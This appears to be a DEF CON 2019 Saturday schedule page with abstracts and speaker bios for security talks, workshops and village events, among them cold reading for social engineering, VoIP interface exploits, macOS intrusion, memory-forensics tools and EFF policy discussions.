Cold reading is a technique to make others believe that you have psychic powers. After reading everything I could find on cold reading, I ran a two-day experiment during the Veracode Hackathon, where I gave psychic readings to colleagues whom I didn’t know personally. Each participant filled in a survey at the end of the reading, and gave me a short video statement about the experience.

In this talk, I'll introduce the concept of cold reading, my experiments, and recommendations for using cold reading techniques in social engineering. I’ll walk through the set-up of the experiment, which included setting the scene through props, gauging the “sitter’s” level of experience and openness to psychic readings, and then the various techniques I applied. These included using statements rather than questions, rainbow ruses based on reading social cues, and playing with probabilities. The talk includes video testimonials and survey results to show the effectiveness of the techniques in the experiment.

We’ll then switch to applying cold reading to social engineering. We’ll cover how props help build your authority if you introduce them in the right way. Using statements rather than questions demonstrates that you are an insider and know the company or situation well, which builds rapport fast. Gauging whether a target is tech savvy helps you tailor your attack. Researching frequently used hardware and software (probability game) and using these in statements can further build your authority. We’ll learn how fortune tellers are never wrong, and how to build justifications so you are always right. Doing OSINT research on your target will help your hit rate, which is what psychics call a warm reading. Before going into questions we’ll cover the following week’s winning numbers for MegaMillions.

Chris Kirsch: @chris_kirsch
Chris Kirsch (@chris_kirsch) has always had a passion for security, but bad life choices led him to a career in marketing – for many DEF CON attendees just one step above a rose seller. He has enjoyed working product marketing jobs at PGP Corporation, nCipher, Rapid7 and now Veracode. Born in Germany, he has lived in Switzerland, the United Kingdom, and now the United States. In 2017, Chris received a DEF CON black badge for the Social Engineering CTF by shamelessly taking advantage of nice, trusting people at a Fortune 500 gaming company. Chris is currently looking for an internship with a fortune teller to advance his career.



DC - Paris - Track 2 - Saturday - 14:00-14:45


I'm on your phone, listening - Attacking VoIP Configuration Interfaces

Saturday at 14:00 in Track 2
45 minutes | Demo, Tool, Exploit

Stephan Huber, Fraunhofer SIT

Philipp Roskosch

If toasters talking to fridges is no joke to you, then you are aware of the big Internet of Things hype these days. While all kinds of devices get connected and hacked, one of the oldest classes of IoT devices seems to be forgotten even though it is literally everywhere: VoIP phones.

For configuration and management purposes, VoIP phones run a web application locally on the device. We found several critical bugs (reported CVEs) in the web application as well as in the webserver which enabled us to hijack the phones. Starting with simple XSS and CSRF issues, via command injections and memory corruptions, right through to remote code execution, all popular vulnerability classes can be found on those devices.

We will present our findings together with the tools and strategies we used, and will enable you to do the same with your own phones and other IoT devices.

Further, we will provide helpful ARM shellcode patterns, scripts and tricks which hackers can use to find bugs. We will conclude our talk by showing that automatic tools fail to discover such vulnerabilities. Therefore, manual IoT pentesting is still required.

If you think these management interfaces are not exposed to the internet, you are wrong. In a scan, we found thousands of reachable phones vulnerable to our exploits.

Stephan Huber
Bio Coming Soon

Twitter: @teamsik
Website: www.team-sik.org

Philipp Roskosch
Bio Coming Soon



DC - Paris - Track 3 - Saturday - 10:00-10:45


Information Security in the Public Interest

Saturday at 10:00 in Track 3
45 minutes

Bruce Schneier

Computer security is now a public policy issue. Election security, blockchain, "going dark," the vulnerabilities equities debate, IoT safety, data privacy, algorithmic security and fairness, critical infrastructure: these are all important public policy issues with a strong Internet security component. But while an understanding of the technology involved is fundamental to crafting good policy, there is little involvement of technologists in policy discussions. This is not sustainable. We need public-interest technologists: people from our fields helping craft policy, and working to provide security to agencies and groups working in the broader public interest. We need these people in government, at NGOs, teaching at universities, as part of the press, and inside private companies. This is increasingly critical to both public safety and overall social welfare. This talk both describes the current state of public-interest technology, and offers a way forward for us individually and collectively for our field. The defining policy question of the Internet age is this: How much of our lives should be governed by technology, and under what terms? We need to be involved in that debate.

Bruce Schneier
Bruce Schneier is an internationally renowned security technologist, called a "security guru" by the Economist. He is the author of 14 books—including the New York Times best-seller "Click Here to Kill Everybody"—as well as hundreds of articles, essays, and academic papers. His influential newsletter "Crypto-Gram" and blog "Schneier on Security" are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet and Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an advisory board member of EPIC and VerifiedVoting.org. He is also a special advisor to IBM Security.

Twitter: @schneierblog
Website: https://www.schneier.com



BTVW - Flamingo - 3rd Floor- Savoy Room - Saturday - 09:00-12:59


Introduction To Mac-centric Incident Response Tools And Techniques

Saturday 09:00, Savoy Ballroom, Flamingo (Blue Team Village) (4H)

@crlowell is a member of the security team at an SF-based tech company where he performs incident response, detonates malware, and helps protect employee devices.

Learn how to identify malicious files, determine where malware was downloaded from, configure your own VM Lab, and safely detonate malware to gather IOCs by responding to simulated Mac based incidents.



DL - Planet Hollywood - Sunset 2 - Saturday - 12:00 - 13:50


ioc2rpz

Saturday from 12:00 – 13:50 in Sunset 2 at Planet Hollywood
Audience: Defense

Vadim Pavlov

DNS is the control plane of the Internet, with unprecedentedly detailed views on applications, devices and even transferred data going in and out of a network. 80% of malware uses DNS to communicate with Command & Control, for DNS data exfiltration/infiltration, and for phishing attacks using lookalike domains. Response Policy Zones, or DNS Firewall, is a feature which allows us to apply security policies on DNS. Commercial DNS Firewall feed providers usually do not allow users to generate their own feeds. Cloud-only DNS service providers do not provide feeds for on-prem DNS. ioc2rpz is a DNS server which automatically creates, maintains and distributes DNS Firewall feeds from various local (files, DB) and remote (http, ftp, rpz) sources. This enables easy integration with Threat Intel providers and Threat Intelligence Platforms. The feeds can be distributed to any open source or commercial DNS server which supports RPZ, e.g. ISC BIND, PowerDNS, Infoblox, BlueCat, EfficientIP, etc. With ioc2rpz you can create your own feeds and actions and prevent undesired communications before they happen.

http://ioc2rpz.com

Vadim Pavlov
Vadim is a senior product manager at Infoblox where he manages Security Ecosystem integrations, Security API, and BloxOne Threat Defense. He has more than 15 years of experience in the network and security industry in various roles. He is the author of open source tools such as ioc2rpz (a DNS RPZ feed distribution server) and others. Vadim earned a Master of Science degree in Computer Science (Software Engineering) from a state university in Russia.



Night Life - TBA - Saturday - 21:00-24:30


Title:
IoT Village Party

The IoT Village Mansion Party at DEF CON is back! As your go-to off-strip mansion party we have made a few changes that will make this party even better than last year. . . .
IoT Village Hacker House Party 2019 Tickets


ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 12:00-12:59


Title:
Is It Ethical To Work On Autonomous Weapon Systems?



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 12:50-13:40


Jump-Oriented Programming (JOP) in Smart Contract Honeypots

No description available



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 10:00-10:50


Keynote Blockchain-Security Symbiosis: Security Enabling Blockchains; Blockchains Enabling Security

No description available



BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 17:30-17:59


Killsuit - How The Equation Group Remained Out Of Sight For Years

Saturday 17:30, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@connormorley is a Threat Hunter at Countercept, a 24/7 managed Threat hunting service by MWR Infosecurity. A keen investigator of malicious TTPs, he enjoys experimenting with and dissecting malicious tools to determine functionality and developing detection methodology. As a threat hunter who also holds OSCP accreditation, he is experienced with traditional and “in the wild” malicious actor behaviour.

@laciefan is a Threat Hunter at Countercept, a 24/7 managed Threat hunting service by MWR Infosecurity. Previously an Incident Response investigator, she carries a deep interest in forensic investigations and attack detection. Having knowledge in both offensive and defensive security, she currently holds both CPIA and OSCP accreditation.

When the Shadow Brokers released a large number of Equation Group tools in 2017, many researchers jumped on the analysis of EternalBlue, FuzzBunch, etc. The exploits from the leak have now been thoroughly analysed and mostly patched, but the workings of its persistence tool (Danderspritz) are still widely unknown. In our talk, we are going to break down the Killsuit modules of Danderspritz. Killsuit (KiSu) is a modular post-exploitation persistence and capability mechanism employed in various hacker frameworks including Danderspritz (DdSz).



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 18:00-18:59


Leveraging Passive Network Mapping with Raspberry Pi and Python

Chet Hosmer, Owner of Python Forensics

Mapping of network assets and their behaviors is a vital step in the prevention of and response to cyber-attacks. Today, active tools like Nmap are used to discover network assets; however, these methods take only a momentary snapshot of network devices. By passively monitoring network activity, the discovery of rogue devices, aberrant behavior, and emerging threats is possible. This talk and demonstration will utilize a Raspberry Pi and a custom Python solution to map network assets and their behaviors, and demonstrate the identification of rogue devices and unauthorized behaviors.

Chet Hosmer (Twitter: @chethosmer) is an international author, educator & researcher, and founder of Python Forensics, Inc., a non-profit research institute focused on the collaborative development of open source investigative technologies using the Python programming language. Chet is also a Visiting Professor at Utica College in the Cybersecurity Graduate Program, where his research and teaching are focused on data hiding, active cyber defense and security of industrial control systems. Additionally, Chet is an Adjunct Professor at Champlain College in the Digital Forensics Graduate Program, where his research and teaching are focused on solving hard digital investigation problems using the Python programming language.



BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 17:30-18:15


5:30 PM: Liven Up: Augmenting Materials for Bio-Hybrid Functionality
Speaker: Rachel Smith

Abstract: What tools are currently available to us to create living or bio-hybrid materials: those that can be animated with biological functionalities for growth, response, distributed information processing, and cuing to the physical and chemical environment (a.k.a. the IoT before the digital IoT)? We seek fascinating ways to augment existing devices (i.e. pregnancy tests), 3D-printed objects, and fabrics to interface with engineered living systems. The illustrated applications of these bio-hybrids range from disease detection to programmable patterning of chemicals or pharmaceutics and embedded reactivity to environmental DNA or particles.

Speaker Bio: A PhD candidate in the Mediated Matter Group at the MIT Media Lab, Rachel hunts for ways to augment existing synthetic materials and devices with biological or living functions. Rachel holds a B.S. in Biomedical Engineering (UVA) and has a colorful past starting up high-accessibility diagnostic tools and running medical hackathons to encourage creative designs for hospital needs.


DL - Planet Hollywood - Sunset 3 - Saturday - 12:00 - 13:50


Local Sheriff

Saturday from 12:00 – 13:50 in Sunset 3 at Planet Hollywood
Audience: AppSec, Code Assessments, and privacy researchers

Konark Modi

The URL is the most commonly tracked piece of information; the innocent choice to structure a URL based on page content can make it easier to learn a user's browsing history, address, health information or more sensitive details. While you as a user browse the internet normally, Local Sheriff works in the background and helps you identify what sensitive information (PII: name, date of birth, email, passwords, passport number, auth tokens) is being shared or leaked to which third parties and by which websites. The issues that Local Sheriff helps identify:

- What sensitive information is being shared with whom?
- Which companies own these third parties?
- What can they do with this information? E.g. de-anonymize users on the internet, create shadow profiles.
- Data points that can be used for tracking a user across the web.
- Insights into which companies know what about you on the internet.

Local Sheriff can also be used by organizations to audit:

- Which third parties are being used on their websites.
- Whether the third parties on their websites are implemented in a way that respects users' privacy, so that sensitive data is not leaked to them.

Local Sheriff is a browser extension that can be used with Chrome, Opera, Firefox, Brave, and Cliqz.

https://github.com/cliqz-oss/local-sheriff/tree/master/scripts

Konark Modi
Konark works as a Tech Lead with Cliqz GmbH, developing a privacy-focused search engine and browser. He works on projects ranging across Privacy by Design, anonymous data collection like Human Web, Anti-Tracking, etc. Prior to Cliqz, Konark was working with one of the largest e-commerce websites in India (Makemytrip.com) in the data platform and security team, solving interesting challenges related to DWH, BI and data security. His recent personal projects, in an endeavor to help organizations fix vulnerabilities, have spanned browsers, health trackers, government services, travel mobile apps, etc.



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 13:40-14:05


Low-Hanging Fruits in Blockchain Security

No description available



RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 13:05-15:10


WORKSHOP

Manhunting 101 - OSINT Crash Course vs Human Targets

1305 - 1510



DC - Planet Hollywood - Firesides Lounge - Saturday - 20:00-21:59


Meet the EFF - Meetup Panel

Saturday at 20:00 in Firesides Lounge
120 minutes

Kurt Opsahl, Deputy Executive Director And General Counsel, EFF

Camille Fischer, Frank Stanton Fellow, EFF

Bennett Cyphers, Staff Technologist, EFF

Nathan 'nash' Sheard, Grassroots Advocacy Organizer, EFF

Shahid Buttar, Panel Host and Director of Grassroots Advocacy, EFF

Join staffers at the Electronic Frontier Foundation—the nation's premier digital civil liberties group fighting for freedom and privacy in the computer age—for a candid chat about how the law is racing to catch up with technological change.

Then meet representatives from Electronic Frontier Alliance allied community and campus organizations from across the country. These technologists and advocates are working within their communities to educate and empower their neighbors in the fight for data privacy and digital rights.

This discussion will include updates on current EFF issues such as the government's effort to undermine encryption (and add backdoors), the fight for network neutrality, discussion of our technology projects to spread encryption across the Web and emails, updates on cases and legislation affecting security research, and much more.

Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law, surveillance and technology issues that are important to you.

Kurt Opsahl
Kurt Opsahl is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project, and is representing several companies who are challenging National Security Letters. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arriba Soft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.

Camille Fischer
Camille Fischer is a Frank Stanton Fellow working on EFF’s free speech and government transparency projects. Camille came to EFF from D.C. where she worked in the Obama White House and in the Department of Commerce advocating for civil, human rights, and due process protections in national security and law enforcement policies. She also ran projects to increase consumer security and privacy, like the move to chip cards (sorry not sorry), and has war stories about ECPA Reform, MLATs, and encryption. Camille graduated from Georgetown University Law Center and the University of Georgia (Go Dawgs). She takes pics and bakes pies.

Bennett Cyphers
Bennett is an engineer on the Tech Projects team, where he works on Privacy Badger and HTTPS Everywhere.

Before EFF, Bennett was at Access Now and MIT, and he has a Master's of Engineering for work on privacy-preserving machine learning. He cares about privacy, transparency, data ownership, and digital equity. He wishes ad companies would kindly stop tracking everyone. Outside of work he has hobbies and likes fun.

Nathan 'nash' Sheard
As EFF's Grassroots Advocacy Organizer, nash works directly with community members and organizations to take advantage of the full range of tools provided by access to tech, while engaging in empowering action toward the maintenance of digital privacy and information security.

Shahid Buttar
Shahid leads EFF's grassroots, student, and community outreach efforts. He's a constitutional lawyer focused on the intersection of community organizing and policy reform as a lever to shift legal norms, with roots in communities across the country resisting mass surveillance. From 2009 to 2015, he led the Bill of Rights Defense Committee as Executive Director.

Outside of his work at EFF, Shahid also DJs and produces electronic music, writes poetry & prose, kicks rhymes, organizes guerilla poetry insurgencies, plays capoeira, speaks truth to power on Truthout, occasionally elucidates legal scholarship, and documents counter-cultural activism for the Burning Man Journal. He also serves on the Boards of Directors of Defending Rights and Dissent, the Center for Media Justice, and the Fund for Constitutional Government.


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 15:00-15:30


Memhunter - Automated Hunting Of Memory Resident Malware At Scale

Saturday 15:00, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@marcosd4h is an experienced, self-motivated, and results-driven software architect who loves to program not only to create code but to create value. He has had extensive experience with heterogeneous technologies and computer architectures. Over his years of professional work experience, computer security has long been his passion - whether it has been around designing exploit prevention capabilities of an endpoint security solution, or doing vulnerability research on carrier-grade telco charging software, or analyzing an exploit/malware to create a detection signature, or just participating in CTFs for fun. Marcos is currently working at McAfee as a Software Architect, leading the development of the exploit-prevention technology components which are part of the company's next-generation flagship product called Endpoint Security (ENS). This product is currently deployed on millions of endpoints worldwide. Marcos also led the organization of the first-ever BSides conference in Cordoba, Argentina.

@chgaray is an experienced infosec analyst who drives strategic initiatives and provides thought leadership and insights regarding the ever-changing global threat landscape at Claro America Movil offices in South America. He organized the 1hackparaloschicos local security conferences in the past, and now he is working on the organization of the first-ever BSides conference in Cordoba, Argentina.

Memhunter is an endpoint sensor tool specialized in detecting memory-resident malware. The detection process is performed through a combination of endpoint data collection and memory inspection scanners. Memhunter automates the detection of memory-resident malware at scale. The tool is a standalone binary that, upon execution, deploys itself as a Windows service. Once running as a service, memhunter starts collecting ETW events that might indicate code injection attacks. The live stream of collected events is fed into memory inspection scanners that use detection heuristics to down-select the potential attacks to the ones that represent actual fileless threats. The entire detection process requires neither human intervention nor memory dumps, and it can be performed by the tool itself, at scale, improving the threat hunting analysis process and remediation times.



DL - Planet Hollywood - Sunset 6 - Saturday - 10:00 - 11:50


Memhunter - Automated hunting of memory resident malware at scale

Saturday from 10:00 – 11:50 in Sunset 6 at Planet Hollywood
Audience: Defense

Marcos Oviedo

Memhunter is an endpoint sensor tool specialized in detecting memory-resident malware. The detection process is performed through a combination of endpoint data collection and memory inspection scanners. The tool is a standalone binary that, upon execution, deploys itself as a Windows service. Once running as a service, memhunter starts collecting ETW events that might indicate code injection attacks. The live stream of collected events is fed into memory inspection scanners that use detection heuristics to down-select the potential attacks. The entire detection process requires neither human intervention nor memory dumps, and it can be performed by the tool itself, at scale, improving the threat hunting analysis process and remediation times. The tool was designed as a replacement for memory forensic mechanisms such as the Volatility malfind and hollowfind plugins, which require human analysis and memory dumps to find suspicious artifacts in memory. Besides the data collection and hunting heuristics, the project has also led to the creation of a companion tool called minjector that contains 20+ code injection techniques. The minjector tool can be used to exercise memhunter detections, and as a one-stop learning resource on well-known code injection techniques.

https://github.com/marcosd4h/memhunter

Marcos Oviedo
Marcos Oviedo is an experienced, self-motivated, and results-driven software architect who loves to develop software not only to create code but to create value. He has had extensive experience with heterogeneous technologies and computer architectures. Over his years of professional work experience, computer security has long been his passion—whether it has been around designing exploit prevention capabilities of an endpoint security solution, or doing vulnerability research on carrier-grade telco charging software, or just participating in CTFs for fun. Marcos is currently working as an Endpoint Software Architect at McAfee. Marcos also organized the first-ever BSides conference in Cordoba, Argentina.



DC - Paris - Track 4 - Saturday - 11:00-11:45


Meticulously Modern Mobile Manipulations

Saturday at 11:00 in Track 4
45 minutes | Demo

Leon Jacobs Researcher - SensePost

Mobile app hacking peaked in 2015 with tools like keychain-dumper & ssl-kill-switch released but requiring jailbroken/rooted devices. Back then, wresting the power to understand & modify apps on our devices from dystopian looking mega corps was our cause. As jailbreaks became infrequent, the hackers’ arsenal was left behind. While this is progress against dark uses of hacking, done to protect our freedom fighters, how can hackers still hold power to account? Can we still find flaws in apps/devices & live up to the protections the technology promises?

Enter runtime binary instrumentation with Frida. It’s possible to analyze apps in their final state when executed on real hardware running the latest iOS/Android with no jailbreaks. This fills a gap between source analysis & debuggers. But, simply enumerating app classes requires studying multiple blogs & a deep read of the docs. We created Objection to simplify this & hide the boilerplate so hackers could focus on unravelling apps. But, many people still rely on simple hacks & automation & rarely use new advanced techniques such as reflectively inspecting live heap objects, canary execution tracing, runtime memory edits and filesystem exploration.

We’ll show hackers, malware researchers & security engineers how to use these advanced mobile hacking techniques.

Leon Jacobs
Leon has been hacking for over a decade. He’s plied his trade at SensePost for the last three having previously worked for a bank and ISP in South Africa. Leon spends most of his daytime hours hacking large networks or web and mobile applications. Leon spends most of his nighttime hours building hacking tools and techniques to contribute back to the community.

Twitter: @leonjza



Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead I - Saturday - 10:00-13:59


Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments

Saturday, 1000-1400 in Flamingo, Lake Mead I

Richard Gold Hacker

MacOS has a strong reputation for security and comes with many restrictions, such as the use of an App Store to prevent malicious code from being installed. However, we have found that since MacOS is the minority platform for many software packages and security platforms, it rarely gets the same attention from security vendors as Windows. This workshop will teach you to exploit that lack of attention, in software like Microsoft Office and security platforms like a leading EDR solution, to break in and out of a MacOS estate. The principles also apply to other *nix environments like Linux.

We will walk you through how open source tools, both unmodified and customized, can be used to take advantage of the difference in capability, e.g., script detection, between Windows and non-Windows platforms. We will show you how to map out an environment, how to gain code execution in multiple ways, grab credentials, find files, collect screenshots and webcam shots and exfiltrate the loot while remaining undetected.

The key takeaway is that despite the myriad of operating system security features present in MacOS and Linux, and the addition of EDR, protected MacOS or Linux environments can still be compromised by a diligent attacker using open source tooling. This workshop will show you how!

[Unfortunately we cannot provide an EDR system for you to play with, so please bring your own or practice the techniques without that particular opponent.]

Skill Level Intermediate

Prerequisites: Intermediate command line skills with *nix-style environments like MacOS or Linux

Materials: Your own MacOS laptop, preferably with an EDR solution in place, but the principles will still be valid without one. Microsoft Office is strongly recommended for the client-side attacks.

Max students: 40

Registration: https://www.eventbrite.com/e/mind-the-gap-between-attacking-windows-and-mac-breaking-in-and-out-of-protected-macos-environments-tickets-63608046379
(Opens 8-Jul-19)

Richard Gold
Richard Gold is a hands-on information security professional, who has over a decade's worth of experience in understanding and securing computer networks. With his background as a Certified SCADA Security Architect and a Ph.D. in Computer Networking, Richard uses knowledge he's gained from breaking into systems to better detect and protect networks, as well as build custom tooling. He regularly speaks on these topics at industry events, universities, and in the media.



Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead II - Saturday - 14:30-18:30


Modern Debugging^HWarfare with WinDbg Preview

Saturday, 1430-1830 in Flamingo, Lake Mead II

Chris Alladoum Security Researcher, Sophos Labs

Axel Souchet Hacker

It's 2019 and yet too many Windows developers and hackers alike rely on (useful but rather) old school tools for debugging Windows binaries (OllyDbg, Immunity Debugger). What they don't realize is that they are missing out on invaluable tools and functionalities that come with Microsoft's newest WinDbg Preview edition. This hands-on workshop will attempt to level the field by practically showing how WinDbg has changed to a point where it should be the first tool installed on any Windows (10) binary analysis machine: after a brief intro to the most basic (legacy) commands, this workshop will focus on debugging modern software (vulnerability exploitation, malware reversing, DKOM-based rootkits, JS engines) using modern techniques provided by WinDbg Preview (spoiler alert, to name a few: JavaScript, LINQ, TTD). By the end of this workshop, trainees will have their WinDbg-fu skilled up.

Skill Level Intermediate

Prerequisites: familiarity with Windows platform and kernel debugging
basic knowledge of debuggers (pref. WinDbg)
basic knowledge of JavaScript

Materials: Any modern laptop with at least one Windows 10 VM guest (pref. 2 for kdnet remote debugging, but can work out with lkd). Also need Internet access.

Max students: 20

Registration: https://www.eventbrite.com/e/modern-debugginghwarfare-with-windbg-preview-lake-mead-ii-tickets-63998510267
(Opens 8-Jul-19)

Chris Alladoum
Chris is a security researcher and part of the Offensive Security team at Sophos Labs in Vancouver, Canada. His focus is on reverse engineering and exploitation, Windows and Linux OS internals, writing code and CTFs.

Axel Souchet
Axel is a computer and security enthusiast.



CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 16:00-17:59


Speaker: Andrew Krug

Twitter: @andrewkrug

In this workshop, you will learn about open-source projects and how they can support your security detection and response in the cloud. Learn how open-source technologies can help you assess and deal with incidents in your environment. Look at automated response, and learn how to respond to and remediate issues in your cloud environment using open-source systems, specifically Mozilla MozDef: Enterprise Defense Platform.

About Andrew: Andrew Krug is the founder of the open source project ThreatResponse, which includes popular tools like AWS_IR and MargaritaShotgun. Krug works as a Staff Security Engineer at Mozilla focused on Identity and Access Management and Cloud Security. Previously Krug has been a re:Invent, re:Inforce, BlackHat, BSides PDX speaker, and more.



Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 24:00-24:59


Title:
Music - Acid-T A.K.A. DJ SmOke

No description available

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 25:00-25:59


Title:
Music - Clockwork Echo

No description available

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 22:00-22:59


Title:
Music - Icetre Normal

No description available

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 21:00-21:59


Title:
Music - Kampf

No description available

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 23:00-23:59


Title:
Music - Scotchandbubbles

No description available

ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 16:00-16:59


Title:
National Collegiate Penetration Testing Competition & Ethical Challenges



DC - Paris - Track 4 - Saturday - 14:00-14:45


Next Generation Process Emulation with Binee

Saturday at 14:00 in Track 4
45 minutes | Demo, Tool

Kyle Gwinnup Senior Threat Researcher, Carbon Black

John Holowczak Threat Researcher

The capability to emulate x86 and other architectures has been around for some time. Malware analysts have several tools readily available in the public domain. However, most of the tools stop short of full emulation, halting or doing strange things when emulating library functions or system calls not implemented in the emulator. In this talk we introduce a new tool into the public domain, Binee, a Windows process emulator. Binee creates a nearly identical Windows process memory model inside the emulator, including all dynamically loaded libraries and other Windows process structures. Binee mimics much of the OS kernel and outputs a detailed description of all function calls with human-readable parameters through the duration of the process. We've designed Binee with two primary use cases in mind: first, data extraction at scale with a cost and speed similar to common static analysis tools, and second, malware analysts that need a custom operating system and framework without the overhead of spinning up various configurations of virtual machines. Currently Binee can run on Windows, OS X, and Linux.

Kyle Gwinnup
Kyle is a Senior Threat Researcher in Carbon Black's TAU team. He has over 10 years of experience in many areas of computer science and IT. Prior to Carbon Black, Kyle worked in finance and with the DoD in various roles ranging from network/systems administrator, software engineer, reverse engineer, penetration tester and offensive tool developer. At Carbon Black, Kyle's focus is on large scale program analysis, primarily static but moving asymptotically toward dynamic analysis.

Twitter: @switchp0rt

John Holowczak
John is a Threat Researcher on Carbon Black's Threat Analysis Unit, focusing on automation of threat detection and building out infrastructure for large scale malware analysis. Within the field of threat detection and analysis, John specializes his research in binary classification, dynamic analysis and reverse engineering.

Twitter: @skipwich



DC - Paris - Track 2 - Saturday - 16:00-17:45


NOC NOC. Who's there? All. All who? All the things you wanted to know about the DEF CON NOC and we won't tell you about

Saturday at 16:00 in Track 2
105 minutes

The DEF CON NOC

It's been a while, something like DEF CON 19, since we had the chance to have more than a few minutes at closing ceremonies to talk to everyone about the DEF CON NOC. It is not uncommon for people during the show or throughout the year to come to us asking things here and there about the DEF CON network. Come see all the DEF CON NOC team on stage, yes, those you usually don't see anywhere during the show, because, well, we're making sure packets are flowing and people are interneting. Come learn what we do, how we do it and possibly answer any questions that you might have about the "most hostile network in the planet".

The DEF CON NOC
@DEFCON_NOC, @effffn, @macmceniry, @Mike_Moore, @mansimusa, @c7five, @_CRV, @jaredbird, all the other NOC members who refuse to share their twitter handles and our very special guest Lord Raytheon



BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 10:00-10:15


10:00 AM: Opening Words
Welcome to the Biohacking Village!


DL - Planet Hollywood - Sunset 2 - Saturday - 14:00 - 15:50


OWASP Amass

Saturday from 14:00 – 15:50 in Sunset 2 at Planet Hollywood
Audience: Red Team, Blue Team, Bug Bounty Hunters, Penetration Testers

Jeff Foley & Anthony Rhodes

Today, organizations deal with the challenge of running their infrastructure across many networks and namespaces due to the use of cloud and hosting services, legacy environments and acquisitions. This can make it difficult for an organization to maintain visibility of its Internet-facing assets and an ability to track down systems that pose a risk to its security posture. The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery. During this talk, contributors to the project will discuss how OWASP Amass uses OSINT, network reconnaissance, graph databases and information sharing to provide both attackers and defenders better visibility of target organizations. Presenters will be providing an in-depth tour of all OWASP Amass features with tips and tricks shown along the way.

https://github.com/OWASP/Amass

Jeff Foley
Jeff Foley is the Founder and Project Leader of OWASP Amass. Jeff has spent nearly twenty years as an innovative technologist taking on challenges in the area of cyber warfare. He started the Amass project after noticing the need for practical OSINT tools that aid information security professionals in mapping complex networks.

Anthony Rhodes
Anthony Rhodes has over five years of industry experience as a penetration tester, red teamer, and software engineer. He has been following the OWASP Amass Project since its inception and has recently joined as a contributor to help enrich its functionality beyond DNS enumeration and network mapping.



CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 11:45-12:15


Speaker: Setu Parimi

Twitter: NA

Abstract: Policy as Code Bot (PacBot) is a platform for continuous compliance monitoring, compliance reporting and security automation for the cloud. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot auto-fix framework provides the ability to automatically respond to policy violations by taking predefined actions.

PacBot packs in powerful visualization features, giving a simplified view of compliance and making it easy to analyze and remediate policy violations. PacBot is more than a tool to manage cloud misconfiguration, it is a generic platform that can be used to do continuous compliance monitoring and reporting for any domain.

About Setu: Cloud Security Architect specializing in defense in depth and incident response in the cloud.



AVV - Bally's Event Center - Saturday - 10:00-10:59


Panel – The Long Haul: The State of Aviation Security Policy

Synopsis

  • Andrea (@amatwyshyn and @PSUPILOTlab), the moderator, will provide an introduction to the law of air safety regulation using the case study of the Boeing 737 MAX.
  • Stefan will discuss the state of aircraft avionics vulnerabilities, comparing and contrasting with other industries.
  • Pete will offer a pilot’s perspective, explaining how aviation prevents critical safety or security incidents through a layering of people, process and technology.
  • RenderMan will update his DEFCON talk on air traffic spoofing, sharing what happened after his talk in terms of policy response.

About Our Panel

Andrea is a professor at Penn State in the law school and engineering school and the founding director of the PSU PILOT lab. https://www.andreamm.com/

Stefan is a professor in the Department of Computer Science and Engineering at University of California, San Diego. https://cseweb.ucsd.edu/~savage/

Pete is a former fast jet pilot and Flight Safety Officer and an independent cyber security adviser based in London. https://www.atlanticcouncil.org/about/experts/list/pete-cooper

RenderMan is a security enthusiast with a focus on security threats of all sorts. He is the founder/chief researcher of the Internet of Dongs project. https://ca.linkedin.com/in/brad-haines-renderman-2bb4638



DL - Planet Hollywood - Sunset 4 - Saturday - 12:00 - 13:50


PCILeech and MemProcFS

Saturday from 12:00 – 13:50 in Sunset 4 at Planet Hollywood
Audience: Offense, Defense, Forensics, Hardware

Ulf Frisk & Ian Vitek

PCILeech and MemProcFS: The PCILeech direct memory access attack toolkit was presented at DEF CON 24 and quickly became popular amongst red teamers, governments and game cheaters alike. We will demonstrate how to take total control of still vulnerable systems with PCIe DMA code injection using affordable FPGA hardware and the open source PCILeech direct memory access attack toolkit. MemProcFS - The Memory Process File System is memory forensics and analysis made super easy! Analyze memory by clicking on files in a virtual file system or by using the C and Python API. A wide range of memory acquisition methods are supported. Analyze memory dump files by point and click, analyze live memory acquired using PCILeech PCIe FPGA hardware devices or even live memory acquired in real time from remote hosts over the network. Zero-cost open source memory forensics and incident response?

